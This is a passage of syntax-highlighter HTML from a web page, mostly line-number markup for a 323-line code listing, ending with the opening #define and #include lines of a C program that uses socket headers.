class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-151\">151<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-154\">154<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-157\">157<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-158\">158<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-159\">159<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-160\">160<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-161\">161<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-162\">162<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-163\">163<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-164\">164<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-165\">165<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-166\">166<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-167\">167<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-168\">168<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-169\">169<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-170\">170<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-171\">171<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-172\">172<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-173\">173<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-174\">174<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-175\">175<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-176\">176<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-177\">177<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-178\">178<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-179\">179<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-180\">180<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-181\">181<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-182\">182<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-183\">183<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-184\">184<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-185\">185<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-186\">186<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-187\">187<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-188\">188<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-189\">189<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-190\">190<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-191\">191<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-192\">192<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-193\">193<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-194\">194<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-195\">195<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-196\">196<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-197\">197<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-198\">198<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-199\">199<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-200\">200<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-201\">201<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-202\">202<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-203\">203<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-204\">204<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-205\">205<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-206\">206<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-207\">207<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-208\">208<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-209\">209<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-210\">210<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-211\">211<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-212\">212<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-213\">213<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-214\">214<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-215\">215<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-216\">216<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-217\">217<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-218\">218<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-219\">219<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-220\">220<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-221\">221<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-222\">222<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-223\">223<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-224\">224<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-225\">225<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-226\">226<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-227\">227<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-228\">228<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-229\">229<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-230\">230<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-231\">231<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-232\">232<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-233\">233<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-234\">234<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-235\">235<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-236\">236<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-237\">237<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-238\">238<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-239\">239<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-240\">240<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-241\">241<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-242\">242<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-243\">243<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-244\">244<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-245\">245<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-246\">246<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-247\">247<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-248\">248<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-249\">249<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-250\">250<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-251\">251<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-252\">252<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-253\">253<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-254\">254<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-255\">255<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-256\">256<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-257\">257<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-258\">258<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-259\">259<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-260\">260<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-261\">261<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-262\">262<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-263\">263<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-264\">264<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-265\">265<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-266\">266<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-267\">267<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-268\">268<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-269\">269<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-270\">270<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-271\">271<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-272\">272<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-273\">273<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-274\">274<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-275\">275<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-276\">276<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-277\">277<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-278\">278<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-279\">279<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-280\">280<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-281\">281<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-282\">282<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-283\">283<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-284\">284<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-285\">285<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-286\">286<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-287\">287<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-288\">288<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-289\">289<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-290\">290<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-291\">291<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-292\">292<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-293\">293<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-294\">294<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-295\">295<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-296\">296<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-297\">297<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-298\">298<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-299\">299<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-300\">300<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-301\">301<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-302\">302<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-303\">303<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-304\">304<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-305\">305<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-306\">306<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-307\">307<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-308\">308<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-309\">309<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-310\">310<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-311\">311<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-312\">312<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-313\">313<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-314\">314<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-315\">315<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-316\">316<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-317\">317<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-318\">318<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-319\">319<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-320\">320<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-321\">321<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-322\">322<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-323\">323<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-1\"><span class=\"crayon-p\">#define _GNU_SOURCE<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-2\"><span class=\"crayon-p\">#include &lt;stdarg.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-3\"><span class=\"crayon-p\">#include &lt;stdint.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-4\"><span class=\"crayon-p\">#include &lt;stdio.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-5\"><span class=\"crayon-p\">#include &lt;string.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-6\"><span class=\"crayon-p\">#include &lt;time.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-7\"><span class=\"crayon-p\">#include &lt;stdlib.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-8\"><span class=\"crayon-p\">#include &lt;sys\/socket.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-9\"><span class=\"crayon-p\">#include &lt;sys\/types.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-10\"><span class=\"crayon-p\">#include &lt;sys\/wait.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-11\"><span class=\"crayon-p\">#include &lt;sys\/stat.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-12\"><span class=\"crayon-p\">#include &lt;netinet\/in.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-13\"><span class=\"crayon-p\">#include &lt;arpa\/inet.h&gt;<\/span><\/div>\n<div 